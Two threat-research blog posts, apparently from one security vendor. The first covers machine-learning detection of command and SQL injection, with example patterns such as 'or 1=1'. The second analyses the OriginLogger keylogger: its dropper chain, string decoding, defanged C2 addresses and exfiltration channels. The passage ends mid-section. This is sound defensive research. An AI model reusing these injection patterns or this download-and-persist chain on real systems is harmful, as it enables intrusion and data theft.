Code injection is an attack technique widely used by threat actors to launch arbitrary code execution on victim machines through vulnerable applications. In 2021, the Open Web Application Security Project (OWASP) ranked it as third in the top 10 web application security risks.

Given the popularity of code injection in exploits, signatures with pattern matches are commonly used to identify the anomalies in network traffic (mostly URI path, header string, etc.). However, injections can happen in numerous forms, and a simple injection can easily evade a signature-based solution by adding extraneous strings. Therefore, signature-based solutions will often fail on the variants of the proof of concept (PoC) of Common Vulnerabilities and Exposures (CVEs). In this blog, we explore how deep learning models can help provide more flexible coverage that is more robust to attempts by attackers to avoid traditional signatures.

Palo Alto Networks Next-Generation Firewall customers receive protections from such types of attacks through Cloud-Delivered Security Services including Intrusion Prevention capabilities in Advanced Threat Prevention, as well as through WildFire.

Related Unit 42 topics SQL injection, command injection, deep learning

Why Intrusion Prevention System Signatures Aren’t Sufficient – How Machine Learning Can Help

Intrusion Prevention System (IPS) signatures have long been proven to be an efficient solution for cyberattacks. Depending on predefined signatures, IPS can accurately detect known threats with few or no false positives. However, creating IPS rules involves proof of concept or technical analysis of certain vulnerabilities, so it is challenging for IPS signatures to detect unknown attacks due to a lack of knowledge. For example, remote code execution exploits are often crafted with vulnerable URI/parameters and malicious payloads, and both parts should be identified to ensure threat detection. On the other hand, in zero-day attacks, both parts can be either unknown or obfuscated, making it difficult to have the needed IPS signature coverage. In our experience, we found the following set of challenges faced by threat researchers:

  • False negatives. Variations and zero-day attacks are seen every day, and IPS cannot have full coverage for all of them due to a lack of attack details beforehand.
  • False positives. To address variants and zero-day attacks, generic rules with loose conditions are created, which inevitably brings the risk of false alarm.
  • Latency. The time lag between vulnerability disclosure, security vendors rolling out protections and customers applying security patches represents a significant window for attackers to exploit the end user.

While these problems are innate to the nature of IPS signatures, machine learning techniques can address these shortcomings. Based on real-world zero days and benign traffic, we trained machine learning models to address common attacks such as remote code execution and SQL injection. From our recent research, presented in this blog, we find that these models can be very helpful in zero-day exploit detection, being both more robust and quicker to respond than traditional IPS methods.

In the following sections, we’ll share some case studies and insights into how machine learning models can be incorporated into exploit detection modules, and how effective this can be.

Detection Case Studies on Zero-Day Exploits

Case Study 1: Command Injection Detection

Command injection has long been a major threat in network security. Due to their easy-to-exploit nature and severe impact, command injection vulnerabilities have the potential to bring tremendous damage to affected organizations, especially when patches come late. Last year, vulnerabilities in commonly used software such as Log4Shell and SpringShell placed hundreds of millions of Java-based servers and web applications at risk. Meanwhile, vendors were busy updating IPS signatures to cover constantly evolving attack patterns derived from the original exploit in a frustrating cat-and-mouse chase, and we still see obfuscated attacks attempted today.

Generally, for those vulnerabilities which include specific paths or parameters, IPS signatures are a good idea since attacks can be accurately filtered out by the URI and suspicious payload. However, some exploits of critical vulnerabilities can be flexible due to the nature of HTTP protocols. For example, the Log4Shell vulnerability can be triggered through all kinds of user inputs. Moreover, the complexity of HTTP encoding methods allows attackers to evade normal detection using partial or mixed encoding. In such situations, machine learning methods can more accurately identify abnormal traffic, yielding corresponding verdicts with the knowledge of previously seen malicious sample payloads.

We trained a state-of-the-art Convolutional Neural Network (CNN) with cutting edge deep learning technologies loosely based on previous academic research on Temporal Convolutional Networks. While variable length inputs suggest that a recurrent model structure such as a Recurrent Neural Network (RNN) or a Long Short-Term Memory (LSTM) Network may be suitable, research shows that a simple convolutional architecture often outperforms recurrent models. Our model has learned more generalizable common patterns in command injection exploits while also being specific enough to avoid false positives. In the following sections, we discuss case studies of command injection exploits and how our new machine learning model is able to accurately detect them.

1. Atlassian Confluence vulnerability (CVE-2022-26134)

Atlassian Confluence is a web-based corporate wiki tool used to help teams to collaborate and share knowledge efficiently. One recent remote code execution vulnerability, CVE-2022-26134, targets Confluence versions 1.3.0-7.4.17, 7.13.0-7.13.7, 7.14.0-7.14.3, 7.15.0-7.15.2, 7.16.0-7.16.4, 7.17.0-7.17.4 and 7.18.0-7.18.1. We have observed successful exploitation leveraging this vulnerability to perform Cerber Ransomware attacks.

One PoC attack leveraging CVE-2022-26134.
Figure 1. One PoC attack leveraging CVE-2022-26134.

Malicious but arbitrary commands can be inserted in the payload to perform various activities. The machine learning model can easily distinguish between benign and malicious activities and block the attacks using different commands without knowing the full context of the application.

2. Unknown IoT Zero-Day Attack

Sometimes we see alerts from our internal threat hunting research platform when processing real-world traffic. After filtering out false positives, these types of detections usually indicate that a zero-day attack has been captured. For example, on April 29, 2022, we saw the HTTP request shown in Figure 2.

An HTTP request that could be attributed to a previously unknown attack targeting certain MIPS-based smart devices.
Figure 2. An HTTP request that triggered an alert on our machine learning model.

The command and control (C2) server was down shortly after we got the traffic, so it is difficult to verify details of the exploit and payload. However, according to our threat intelligence, this could be attributed to a previously unknown attack targeting certain MIPS-based smart devices.

With traditional IPS technologies, it’s possible to miss such attacks since the vulnerable URI and parameters have never been seen before; it’s hard to determine if the requested data is benign or suspicious. In this specific case, our IPS with a default configuration did not result in an alert, but our machine learning model successfully identified the attack with a high confidence score.

3. Tenda AC18 Router Vulnerability (CVE-2022-31446)

The Tenda AC18 router is prone to a remote code execution vulnerability, allowing attackers to execute arbitrary commands on the device. Not long after the vulnerability was published, a Palo Alto Networks researcher discovered an exploit in the wild targeting this specific CVE, as shown in Figure 3.

Exploit in the wild targeting CVE-2022-31446, a remote code execution vulnerability in Tenda AC18 routers.
Figure 3. Exploit in the wild targeting CVE-2022-31446.

Similar to the zero-day IoT attack mentioned above, it's difficult for traditional IPS solutions to detect such attacks due to their inherent limitations. However, our machine learning model detected the exploit with high confidence. The machine learning model identifies that requests in the POST body are highly suspicious and suggests the IP address shown in Figure 3 should be further investigated with correlated malicious samples.

Case study 2: SQL Injection Detection

SQL injections are another notorious and challenging threat in network security. In this type of attack, threat actors alter SQL queries and inject malicious code by exploiting vulnerabilities. SQL injections may result in information modification, sensitive data leakage and unauthorized command executions in underlying database systems. Due to the serious potential impact of SQL injection vulnerabilities, their prompt detection and zero-day exploit prevention on the network side are critical to fortifying an organization’s assets.

Unfortunately, the task is challenging with traditional IPS systems due to time limitations and the need for technical expertise. Traditional systems require properly composing and testing customized signatures to cover zero-day SQL exploitations, such as exploits targeting, for example, CVE-2022-0332 and CVE-2022-34265. Even worse, attackers may utilize readily available hacking tools such as sqlmap to generate SQL injection exploitations that are very difficult to cover with IPS signatures. In this case, machine learning solutions can effectively classify malicious SQL injection payloads from benign traffic by examining carefully selected features covering a variety of SQL injection exploitations. The following vulnerability case studies demonstrate the effectiveness and efficiency of the machine learning solutions we have developed.

1. Moodle vulnerability (CVE-2022-0332)

Moodle is a free and open source learning management system with more than 300 million users. However, Moodle versions 3.11 to 3.11.4 have a vulnerability (CVE-2022-0332) in the server.php file due to the lack of user input sanitization, making it possible to use the union operator to query unexpected data. When given the following payload, vulnerable versions of Moodle will query the SQLite engine version with the function sqlite_version() and return it to the user. Our machine learning solution effectively derives features from capturing the union-select related SQL injection code snippet and flexibly detects exploitations of CVE-2022-0332.

One PoC leveraging CVE-2022-0332.
Figure 4. One PoC leveraging CVE-2022-0332.

After decoding, the PoC of CVE-2022-0332 is shown in Figure 5.

Decoded PoC of CVE-2022-0332.
Figure 5. Decoded PoC of CVE-2022-0332.

2. Django vulnerability (CVE-2022-34265

Django is a widely used framework to build websites, including Instagram, Disqus, Pinterest, etc. CVE-2022-34265 is an issue affecting the Django framework. This vulnerability is caused by an improper check on parameter values for the Trunc() and Extract() functions, which may lead to unexpected SQL statement execution. Two PoCs for CVE-2022-34265 are shown in Figures 6 and 7. Both payloads use a boolean injection sub-payload followed by a stack injection sub-payload. When a payload is appended to the predefined SQL statement, the first statement split by the semicolon will always be true because of the or 1=1. The second part will lead to a sleep of five seconds by the program, which, on the browser side, leads to a five second waiting time. The five second delay on the front end can indicate the successful SQL statement execution – which also indicates the existence of the SQL injection vulnerability. Our machine learning solution can also effectively detect the SQL injection patterns as or 1=1 statements, which can help us effectively prevent the exploitation of such vulnerabilities.

Two PoCs for CVE-2022-34265.
Figure 6. Two PoCs for CVE-2022-34265.
After decoding, two PoCs for CVE-2022-34265.
Figure 7. After decoding, two PoCs for CVE-2022-34265.

3. sqlmap-generated exploitation

sqlmap is an open source tool used in penetration testing to detect and exploit SQL injection flaws, which can automate the process of crafting exploitations of SQL injection vulnerabilities. While the tool can be used for legitimate purposes, it can also be abused by attackers.

Figure 8 shows a PoC of SQL injection from sqlmap. After decoding, we can observe the snippet and 1043=1043, which is a widely used pattern for blind SQL exploitation. The attacker can leverage the statement to sniff the vulnerabilities of web services and database systems. The pattern is similar to or 1=1 (see our discussion of CVE-2022-34265), but sqlmap can generate polymorphic SQL injection exploitations as long as the statement is always true after and.

These types of patterns are challenging to detect via IPS signatures. While a traditional signature might only be able to match one and 1=1 case, our machine learning solution can properly cover the exploitation with dedicated features for all similar and 1=1 cases.

One PoC from SQLmap. SQL injection detection in cases such as this can be challenging with traditional signature-based solutions.
Figure 8. One PoC from SQLmap.
The decoded PoC from SQLmap shows a widely used pattern for blind SQL exploitation. Patterns like this can make injection detection challenging.
Figure 9. The decoded PoC from SQLmap.

Machine Learning Test Results

For detecting zero day exploits, we trained two machine learning models: one for detecting SQL injection attacks, and one for detecting command injection attacks. We prioritize a low false positive rate in order to minimize adverse effects of deploying these models for detection. For both models, we train on HTTP GET and POST requests. To generate these datasets, we combined multiple sources, including tool-generated malicious traffic, live traffic, internal IPS data sets and more.

From ~1.15 million benign and ~1.5 million malicious samples containing SQL queries, our SQL model achieved a 0.02% false positive rate and a 90% true positive rate.

From ~1 million benign and ~2.2 million malicious samples containing web searches and possible command injections, our command injection model achieves a 0.011% false positive rate and a 92% true positive rate.

These detections are particularly useful because they can provide protections against new zero-day attacks, while being resistant to small modifications that might evade traditional IPS signatures.

Conclusion

Command injection and SQL injection attacks continue to be some of the most common and most concerning threats affecting web applications. While traditional signature-based solutions remain effective against out-of-the-box exploits, they often fail to detect variants; a motivated adversary can make minimum modifications and evade such solutions.

To combat these ever-evolving threats, we developed a context-based deep learning model that proved to be effective in detecting the latest high profile attacks. Our models were able to successfully detect zero-day exploits such as the Atlassian Confluence vulnerability, the Moodle vulnerability and the Django vulnerability. These types of flexible detections will prove to be critical in providing comprehensive defense in an ever-evolving malware landscape.

To protect our customers, the Palo Alto Networks Next-Generation Firewall uses a combined inline and cloud solution. Our traditional IPS solutions remain effective for protecting against a significant portion of existing exploits, including SQL injections and command injections. In addition, the machine learning models we explored in this blog have the potential to provide even more robust protections beyond IPS signatures.

Additional Resources

OWASP Top Ten
A03: 2021 - Injection
sqlmap
An Empirical Evaluation of Generic Convolutional and Recurrent Networks for Sequence Modeling

Case study 1 updated Nov. 8, 2022, to remove some outdated results information.

OriginLogger: A Look at Agent Tesla’s Successor

Executive Summary

On March 4, 2019, one of the most well-known keyloggers used by criminals, called Agent Tesla, closed up shop due to legal troubles. In the announcement message posted on the Agent Tesla Discord server, the keylogger’s developers suggested people switch over to a new keylogger: “If you want to see a powerful software like Agent Tesla, we would like to suggest you OriginLogger. OriginLogger is an AT-based software and has all the features.” OriginLogger is a variant of Agent Tesla. As such, the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.

Recently, when sitting down to analyze some malware tagged as Agent Tesla, I was surprised to learn I was actually looking at something else. This fact revealed itself to me when I began analyzing the malware families’ configurations at scale after creating tooling to extract them.

In this blog, I will cover the OriginLogger keylogger malware, how it handles the string obfuscation for configuration variables and what I found when looking at the extracted configurations that allowed for better identification and further pivoting.

Palo Alto Networks customers receive protections from both OriginLogger and its predecessor malware Agent Tesla through Cortex XDR and the Next-Generation Firewall with cloud-delivered security services including WildFire and Advanced Threat Prevention.

Related Unit 42 Topics Agent Tesla

OriginLogger Builder

When I began researching OriginLogger, I could find little to no public information about it. There are several Agent Tesla-related analysis blogs that I now recognize as pertaining to OriginLogger – sometimes tagged as “AgentTeslav3” – but otherwise, the public internet is pretty light on relevant information.

During my search, I stumbled across a YouTube video posted in 2018 (before Agent Tesla closed up shop) by a person selling “fully undetectable” (FUD) tools. This person showed off the OriginLogger tools with a link to buy it from a known site that traffics in malware, exploits and the like.

OriginLogger feature highlights include: Powerful keyboard hook (detects all keybaord strokes. It does not work with the timer, it hook directly. Origin Logger has support all languages (Chinese, Greek, Latins Etc.); Web Panel (You can monitoring your logs on your hosting. We are providing our panel scripts and we can help you for installation); colored Log (Origin Logger saves logs in HTML colored texts make reading easier); Smart Logger (with this feature, the keylogger starts to work only in the windows where the words you specify are detected).
Figure 1. OriginLogger feature highlights (Source: screenshots of the OriginLogger sale page from a YouTube video on OriginLogger).
Full OriginLogger feature list includes the following: multilanguage support, 3 different delivery: PHP, SMTP and FTP, keylogger, colored log, screenshot logger, multi file binder, clipboard logger, smartlogger, password recovery, web panel, 7/24 support, fake message, autobuy, stable and fast, pure code, all windows OS supported, UAC bypass: WIN 7/8/10, assembly & icon option
Figure 2. OriginLogger feature list.

Additionally, they showed both the web panel and the malware builder.

Screenshot of the Origin Logger web panel, with the "keystrokes" option selected. The panel shows where you can view and delete logs and includes info on Server Time, HWID, Machine Name, Log, IP Address. It offers actions including view/delete, copy, CSV, Excel, PDF and Print
Figure 3. OriginLogger web panel (Source: OriginLogger YouTube video).
OriginLogger builder. The screenshot shots selections including Keyboard Logger (time), Clipboard Logger, Delete Backspaces, Smart Logger (which allows the user to input specific words such as facebook, twitter, gmail, etc.), Screenshot Logger (time)
Figure 4. OriginLogger builder.

The image of the builder shown in Figure 4 was particularly interesting to me as it provided a default string – facebook, twitter, gmail, instagram, movie, skype, porn, hack, whatsapp, discord – that might be unique to this application. Sure enough, a content search on VirusTotal shows one matching file (SHA256: 595a7ea981a3948c4f387a5a6af54a70a41dd604685c72cbd2a55880c2b702ed) uploaded on May 17, 2022.

Searching on VirusTotal for the string "facebook, twitter, gmail, instagram, movie, skype, porn, hack, whatsapp, discord" leads to the file SHA256: 595a7ea981a3948c4f387a5a6af54a70a41dd604685c72cbd2a55880c2b702ed as shown
Figure 5. VirusTotal search for string.

Downloading and attempting to run this file resulted in errors due to missing dependencies; however, knowing the builder’s filename, OriginLogger.exe, allowed me to expand the search and locate a Zip archive (SHA256: b22a0dd33d957f6da3f1cd9687b9b00d0ff2bdf02d28356c1462f3dbfb8708dd) containing all of the files required to run OriginLogger.

bundled files in the Zip archive include OriginLogger.exe, Updater.exe, NetCore.dll, Mono.Cecil.dll, settings.ini, eula.html, profile.origin
Figure 6. Bundled files in Zip archive.

The settings.ini file contains the configuration the builder will use, and in Figure 7 we can see the previous search string listed under SmartWords.

Settings.ini in OriginLogger includes logsettings such as Delivery, remember, keylogger, grabip, Log, ScreenLogger, screeninterval, Clipboard, Backspace, email, toemail, password, smtp, port, SSL, attach, ftphost, ftpuser, ftppassword, URL, UrlKey, istor, telegram_api, telegram_chatid, SmartLogger, SmartWords, smartLoggerType
Figure 7. OriginLogger Builder settings.ini file.

The file profile.origin contains the embedded username/password that a customer registers with when purchasing OriginLogger.

Screenshot of the OriginLogger builder login screen, including fields for email and password and option to remember password.
Figure 8. OriginLogger builder login screen.

Amusingly, if you flip around the values in the profile file, the plaintext password is revealed.

Red arrows indicate which two values can be swapped in the profile.origin file to reveal the plaintext password.
Figure 9. Contents of profile.origin file.
Screenshot of the OriginLogger builder login screen, showing the results of flipping values in the file as shown in Figure 9. The threat actor's password is revealed in plaintext in the e-mail field, while the email is obfuscated in the password field.
Figure 10. OriginLogger builder login screen with threat actor password revealed in plaintext.

When a user logs in, the builder attempts to authenticate with the OriginLogger servers to validate the subscription.

At this point, I had two versions of the builder. The first one (b22a0d*), contained in the Zip file, was compiled Sept. 6, 2020. The other, which contained the SmartWords string (595a7e*), was compiled on June 29, 2022, just about two years after the first.

The later version makes its authentication request over TCP/3345 to IP 23.106.223[.]46. Since March 3, 2022, this IP has resolved to the domain originpro[.]me. This domain has resolved to the following IP addresses:

23.106.223[.]46
204.16.247[.]26
31.170.160[.]61

The second IP, 204.16.247[.]26, stands out due to resolving these other OriginLogger related domains:

originproducts[.]xyz
origindproducts[.]pw
originlogger[.]com

Things get more interesting when looking at the older builder. This one attempts to reach out to a different IP address for the authentication.

The older version of OriginLogger reaches out to 74.118.138[.]76 for authentication as shown in the pcap
Figure 11. PCAP showing remote IP address.
Unlike the IP addresses associated with originpro[.]me, 74.118.138[.]76 does not resolve to any OriginLogger domains directly but instead resolves to 0xfd3[.]com. Pivoting on this domain shows it contains both DNS MX and TXT records for mail.originlogger[.]com.

Beginning around March 7, 2022, the domain in question began resolving to IP 23.106.223[.]47, which is one value higher in the last octet than the IP used for originpro[.]me, which used 46.

These two IP addresses have shared multiple SSL certificates:

SHA1 Serial Number Common Name IPs Observed
2dec9fdf91c3965960fecb28237b911a57a543e2 38041735159378560318847695768150611562 WIN-4K804V6ADVQ 23.106.223[.]46
23.106.223[.]47
7a7e732229287c1d53a360e08201616179217117 133152806647474295963986900899009859692 WIN-4K804V6ADVQ 23.106.223[.]46
23.106.223[.]47
74.118.138[.]76
204.16.247[.]26
3b3cf8039b779d93677273e09961203ffaac2d6f 89480234209393487842197137895395039274 WIN-4K804V6ADVQ 23.106.223[.]46
23.106.223[.]47
74.118.138[.]76
204.16.247[.]26

Table 1. Shared SSL certificates.

The RDP login screens for both of the servers beginning with IP 23.106.223.X show a Windows Server 2012 R2 server with multiple accounts.

RDP login screen for 23.106.223[.]46 shows a Windows Server 2012 R2 server with multiple accounts - administrator, ftpuser and postgres
Figure 12. RDP login screen for 23.106.223[.]46.
When further searching for this domain, I came across the GitHub profile for user 0xfd3, which contains the two repositories shown in Figure 13.

The two GitHub repositories associated with user 0xfd shown in the screenshot are OutlookPasswordRecovery and Chrome-Password-Recovery
Figure 13. User 0xfd GitHub.

I’ll circle back to these later in the blog when looking at the code, but (spoiler alert) they are also used in OriginLogger.

Dropper Lure

Before diving into the malware, I’ll quickly cover the dropper that led to the sample I set out to analyze. As both Agent Tesla and OriginLogger are commercialized keyloggers, the initial droppers will vary greatly between campaigns and should not be considered unique to either. I present the below as a real-world example of an attack dropping OriginLogger and show that they can be quite convoluted and obfuscated.

The initial lure document is a Microsoft Word file (SHA256: ccc8d5aa5d1a682c20b0806948bf06d1b5d11961887df70c8902d2146c6d1481). When opened, this document displays a photo of a passport for a German citizen, along with a credit card. I’m not quite sure how enticing this would be as a lure for a normal user, but either way, you’ll note the inclusion of numerous Excel Worksheets below the image, as shown in Figure 14.

The Microsoft Word document displays a photo of a passport for a German citizen, along with a credit card. Numerous Excel worksheets appear below the image.
Figure 14. Lure document.

Each of these sheets are contained in separate embedded Excel Workbooks and are exactly the same:

dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet1.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet10.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet2.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet3.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet4.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet5.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet6.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet7.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet8.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet9.xls

Within each Workbook is a singular macro that simply saves a command to execute at the following location:

C:\Users\Public\olapappinuggerman.js

Screenshot shows the macro contained within each Excel Workbook in the malicious Word document. This macro saves a command to execute at C:\Users\Public\olapappinuggerman.js
Figure 15. Excel VBA macro.

Once run, this will download and execute via MSHTA the contents of the file at hxxp://www.asianexportglass[.]shop/p/25.html. A screenshot of the website is shown in Figure 16.

A minimalist but legitimate-appearing website at hxxp://www.asianexportglass[.]shop
Figure 16. Website to appear legitimate.
This file contains an embedded obfuscated script in the middle of the document as a comment.

Hidden in a comment in the html of a legitimate-appearing website is an embedded obfuscated script.
Figure 17. Website hidden comment.

Unescaping the script reveals the code shown in Figure 18, which downloads the next payload from a BitBucket snippet (hxxps://bitbucket[.]org/!api/2.0/snippets/12sds/pEEggp/8cb4e7aef7a46445b9885381da074c86ad0d01d6/files/snippet.txt) and establishes persistence with a scheduled task named calsaasdendersw that runs every 83 minutes and uses MSHTA again to execute the script contained within hxxp://www.coalminners[.]shop/p/25.html.

The unescaped script shown downloads the next payload from a BitBucket snippet and establishes persistence with a scheduled task that runs every minutes and uses MSHTA to execute a script.
Figure 18. Unescaped script.

The snippet hosted on the BitBucket website contains further obfuscated PowerShell code and two binaries encoded and compressed.

The first of the two files (SHA256: 23fcaad34d06f748452d04b003b78eb701c1ab9bf2dd5503cf75ac0387f4e4f8) is a C# reflective loader using CSharp-RunPE. This tool is used to hollow out a process and inject another executable inside of it; in this case, the keylogger payload will be placed inside the aspnet_compiler.exe process.

PowerShell command. The command shown begins with [Reflection.Assembly]
Figure 19. PowerShell command to execute method contained in dotNet assembly.
Note the projFUD.PA class that the Execute method is called from. Morphisec released a blog in 2021 called “Revealing the Snip3 Crypter, a highly evasive RAT loader,” where they analyze a crypter-as-a-service and fingerprint the crypter’s author using this artifact.

The second of the two files (SHA256: cddca3371378d545e5e4c032951db0e000e2dfc901b5a5e390679adc524e7d9c) is the OriginLogger payload.

OriginLogger Configuration

As previously stated, the original intention of this analysis was to automate and extract configuration-related details from the keylogger. To achieve this, I started by looking at how the configuration-related strings are used.

I won’t be diving into any of the actual functionality of the malware as it’s fairly standard and mirrors analysis of older Agent Tesla variants. Just as the threat actors’ advertisements state, the malware uses tried and true methods and includes the ability to keylog, steal credentials, take screenshots, download additional payloads, upload your data in a myriad of ways and attempt to avoid detection.

To start extracting configuration-related details, I needed to figure out how the user-supplied data is stored in the malware; it turned out to be straightforward. The builder will take the dynamic string values and concatenate them into a giant blob of text which is then encoded and stored in a byte array to be decoded at runtime. Once the malware runs and hits a particular function that needs a string, such as the HTTP address to upload screenshots to, it will pass the offset and string length to a function that will then carve out the text at that location within the blob.

To illustrate, below you can see the decoding logic used for the main blob of text.

The decoding logic used for OriginLogger's main blob of text.
Figure 20. OriginLogger plaintext blob decoding.

Each byte is XOR’d by the index of the byte within the byte array, and again XOR’d by the value 170 to reveal the plaintext.

For each sample generated by the builder, this blob of text will differ depending on what’s configured, so offsets and positioning will change. Looking at the raw text shown in Figure 21 is helpful, but without splicing it up, it becomes hard to determine where the boundaries end or begin.

Raw plaintext blog used by OriginLogger to store user-supplied data.
Figure 21. Plaintext blob.

It also does not help when it comes time to analyze the malware, as you won’t be able to discern when or where something is used. To figure this next piece out, I needed to look at how OriginLogger handles the splicing.

Below you can see the function responsible for carving out the string, followed by the beginning of the individual methods containing the offset and length.

The screenshot shows the function responsible for carving out the string, followed by the beginning of the individual methods containing the offset and length.
Figure 22. OriginLogger string functions.

In this case, if the B() method is called at some point by the malware, it will pass 2, 2, 27 to the obfuscated nameless function at the top of the image. The first integer is used for the array index where the decoded string will be stored. The second (offset) and third (length) integers are then passed to the GetString function to obtain the text. For this particular entry, the resulting value – <font color="#00b1ba"><b>[ – is used during the creation of the HTML page it uploads to display the stolen data.

Knowing how the string parsing works, I could then automate the extraction of these strings. To start, it helps to look at the underlying intermediate language (IL) assembly instructions.

The underlying OriginLogger IL assembly instructions reveal three ldc.i4.X instructions that create a framework that can then be used to match all of the corresponding functions in the binary for parsing
Figure 23. OriginLogger IL instructions for string function.

For each of these lookups, the structure of the function block will remain the same. At index 6-8 in Figure 23, you will see three ldc.i4.X instructions where X dictates an integer value that will be pushed onto the stack before calling the previously described splicing function. This overall structure creates a framework that can then be used to match all of the corresponding functions in the binary for parsing.

Leveraging this, I wrote a script to identify the encoded byte array, determine the XOR values and then splice up the decoded blob in the same fashion the malware uses it. With this, you can scroll through the decoded strings and look for things of interest. Once something is identified, knowing the offset and subsequent function name, you can pivot into the part of the malware that leverages them.

Example of OriginLogger decoded strings. Includes Index, Offset, Count, etc.
Figure 24. OriginLogger decoded strings.

From here, I started renaming the obfuscated methods to reflect their actual values, which made analysis easier on the eyes.

Example of renaming obfuscated methods to reflect their actual values.
Figure 25. OriginLogger FTP upload function.

It should be noted that the same string deobfuscation can be achieved by using de4dot and its dynamic string decryption feature by specifying the string types as delegate and identifying the tokens of interest. This works extremely well for single file analysis.

Recall that I mentioned in the OriginLogger Builder section of this blog that I’d circle back to the GitHub repositories of the 0xfd3 user. Take a look in Figure 26 at the Chrome Password Recovery code uploaded in March 2020 after OriginLogger took Agent Tesla’s prominence in the keylogger world.

Code from user 0xfd3's "Chrome Password Recovery" GitHub repository. Methods include: Chrome, Opera, Yandex, 360 Browser, Comodo Dragon, CoolNovo, SRWare Iron, Torch Browser and Brave Browser.
Figure 26. Chrome Password Recovery.

Compare Figure 26 to the code from the OriginLogger sample with renamed methods shown in Figure 27.

OriginLogger code with renamed methods, including: Opera, Comodo Dragon, Chrome, 360 Browser, Yandex, SRWare Iron, Torch Browser, Brave Browser, Iridium Browser, CoolNovo, 7Star, Epic Privacy Browser, Amigo, CentBrowser, CocCoc, Chedot, Elements Browser, Kometa, Sleipnir 6, Citrio.
Figure 27. OriginLogger Chrome password stealing function.

Look familiar? These types of similarities abound as OriginLogger has continued development where Agent Tesla left off.

Identifying OriginLogger Through Artifacts

Using this tooling, I extracted 1,917 different configurations, which gives insight into the exfiltration methods used and allows for clustering of samples based on the underlying infrastructure.

This is where I began to understand that what I was looking at wasn’t Agent Tesla but instead a different keylogger – OriginLogger. Two particular exfiltration methods that both showed multiple references to “origin” in some fashion led me to connect the dots.

For example, one of the URLs configured for a sample to upload keylogger and screenshot data to was hxxps://agusanplantation[.]com/new/new/inc/7a5c36cee88e6b.php. This URL is no longer active so I started searching for historical information about it to understand what was on the receiving end of these HTTP POST requests. By plugging in the domain to URLScan.io, it showed login pages for the panel in the same directory but, more importantly, that the OriginLogger web panel (SHA256: c2a4cf56a675b913d8ee0cb2db3864d66990e940566f57cb97a9161bd262f271) was observed on this host at the time of scanning four months ago.

URLScan.io results for the agusanplantation[.]com domain includes an observation of the OriginLogger web panel.
Figure 28. URLScan.io scan history for domain.
Similarly, one of the exfiltration methods is through Telegram bots. To utilize them, OriginLogger requires a Telegram bot token to be included so the malware can interact with it. This provides another unique opportunity to analyze the infrastructure in use. In this case, I can use the token to query Telegram with what equates to a whoami command and observe the names used by the bot creator. Below are a handful of examples showing relevant naming.

"id":2046248941,"is_bot":true,"first_name":"origin","username":"mailerdemon_bot"
"id":1731070785,"is_bot":true,"first_name":"@CodeOnce_bot","username":"PWORIGIN_bot"
"id":1644755040,"is_bot":true,"first_name":"ORIGINLOGGER","username":"softypaulbot"
"id":1620445910,"is_bot":true,"first_name":"ORIGINLOGS","username":"badboi450hbot"
"id":2081699912,"is_bot":true,"first_name":"Zara","username":"Zaraoriginbot"
"id":5054839999,"is_bot":true,"first_name":"Origin Poster","username":"origin_post_bot"

Malicious Infrastructure

Like other keyloggers that are commercially sold, OriginLogger is used by a wide variety of people for various malicious purposes around the globe. In the past, I’ve written about taking a deeper look at the victims of keyloggers and what analyzing their screenshots can reveal about the potential intentions of the attackers. In this blog post, I will summarize some observations of the data extracted from the corpus of OriginLogger samples I collected. Most samples had multiple exfiltration techniques configured and I’ll cover each one below.

SMTP is still the primary mechanism used for exfiltrating data and was identified in 1,909 samples. This is most likely because:

  • The traffic will blend in with normal user traffic better than other included protocols.It’s relatively easy for attackers to obtain stolen e-mail accounts.
  • E-mail providers usually offer a large amount of storage space.

There were 296 unique e-mail recipient addresses for the stolen data and 334 unique e-mail account credentials used to send them.

FTP was configured in 1,888 samples using 56 unique FTP servers and 79 unique FTP accounts, with multiple accounts logging to different directories, likely based on different campaigns. Across the accessible servers, which were limited to 11 of the 56, there are 442 unique victims, with some victims being logged hundreds of times.

Web uploads to the OriginLogger panel followed closely behind and were configured in 1,866 samples, uploading to 92 unique URLs. When analyzing these URLs, the PHP file used for the upload showed a pattern of alphanumeric characters in the filename, with a couple of additional patterns presenting themselves in the directory structure. Looking into the source code of the web panel as shown in Figure 29 shows that the PHP filename is an MD5 value of some random bytes and is placed in the /inc/ (incoming) directory.

Source code for setup.php shows that the PHP filename is an MD5 value of some random bytes and is placed in the /inc/ directory.
Figure 29. OriginLogger source code for setup.php.

Keep in mind that many keylogger purchasers may not have much technical experience and tend to use a “full service” vendor that creates everything for them so that all they are required to do is distribute the keylogger. I suspect this is a reason for a lot of the URIs having similar structures. For example, the structure http://<ipaddress>/<name>/inc/<md5>.php is repeated throughout, and the first level of the directory shows values unlikely to be generated automatically – possibly account-related:

b0ss/inc
rich/inc
divine/inc
ma2on/inc
darl/inc
jboy/inc
newmoney/inc

Likewise, this directory structure changes the inc to mawa and prepends webpanel to the name:

webpanel-roth/mawa
webpanel-qwerty/mawa
webpanel-dawn/mawa
webpanel-charles/mawa
webpanel-muti/mawa
webpanel-ghul/mawa
webpanel-reza/mawa

For the last exfiltration method, we have Telegram identified in 1,732 samples with 181 unique Telegram bots receiving the stolen data. In addition to being able to issue a whoami for the bot, we’re able to query for information related to the channels where stolen information was uploaded. The most prominent of the channels are below with the details currently in use:

